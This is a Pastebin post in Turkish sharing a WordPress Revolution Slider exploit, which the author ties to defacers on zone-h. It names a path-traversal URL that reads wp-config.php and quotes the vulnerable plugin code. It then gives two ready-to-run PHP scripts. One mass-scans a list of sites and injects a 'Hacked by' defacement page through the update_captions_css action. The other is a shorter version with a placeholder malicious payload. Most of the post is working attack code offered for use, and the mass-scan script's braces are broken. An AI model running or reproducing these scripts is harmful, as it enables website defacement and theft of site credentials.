Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Yazar => KingSkrupellos - Cyberizm Digital Security Team
- Selamün Aleyküm Cyberizm Ailesi. Birkaç günden beri zone-h.org'da Index PHP, YunusIncredibl,Islamic State,Holako,Lunatico gibi hackerların kastığı açığı paylaşıcam. Cyberizm için elinizden geleni arkanıza koymayın.
- Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
- Açığın Kaynaklandığı Yerler =>
- [code]/wp-content/plugins/revslider/revslider_admin.php[/code]
- [code]/revslider_admin.php[/code]
- [code]HEDEFSITE/wp-admin/admin-ajax.php[/code]
- [code]HEDEFSITE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[/code]
- Açık direk şu kodlardan oluşuyor.
- [code]232. $action = self::getPostGetVar("client_action");
- 233. $data = self::getPostGetVar("data");
- ...
- 301. case "get_captions_css":
- 302. $contentCSS = $operations->getCaptionsContent();
- 303. self::ajaxResponseData($contentCSS);
- ...
- 305. case "update_captions_css":
- 306. $arrCaptions = $operations->updateCaptionsContentData($data);
- 307. self::ajaxResponseSuccess("CSS file saved
- succesfully!",array("arrCaptions"=>$arrCaptions))[/code]
- Hacklediğiniz Yeri Görmek için =>
- [code]/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css[/code]
- Eğer Exploiti Doğru yaptıysanız yukarıdaki linkten ctrl + a'ya bastığınız zaman
- [code]{"success":true,"message":"","data":"[/code]
- böyle yazıyorsa exploit çalışmış demektir ve yazınız ekranda gözükecektir.
- İşte O Exploit =>
- [hide][code]<?php
- echo "\n+-------------------------------------------+\n";
- echo "| Cyberizm Digital Security Army |\n";
- echo "| http://www.cyberizm.org/ |\n";
- echo "+-------------------------------------------+\n";
- $gv=@file_get_contents($argv[1]);
- $exv=explode("\r\n",$gv);
- echo "\n\t Total site loaded : ".count($exv)."\n\n";
- foreach($exv as $url){
- echo "\n[+]Scaning : $url \n";
- dr($url);
- }
- function dr($site){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- $result = curl_exec($ch);
- if (eregi('true', $result))
- $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
- $gett=@file_get_contents($path);
- if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
- echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
- $fo = fopen("finish.txt","a+");
- $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
- fclose($fo);
- } else {
- echo "| ".$site . " : Not Revslider \n\n";
- }
- curl_close($ch);
- }
- echo "\n[-]Exploit Fail \n\n";
- }
- }
- ?>[/code][/hide]
- Exploitin Daha Kısa Şekli
- [hide][code]<?php
- $post = array
- (
- "action" => "revslider_ajax_action",
- "client_action" => "update_captions_css",
- "data" => "<marquee>Malicious Code Here</marquee>"
- );
- $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- ?>[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement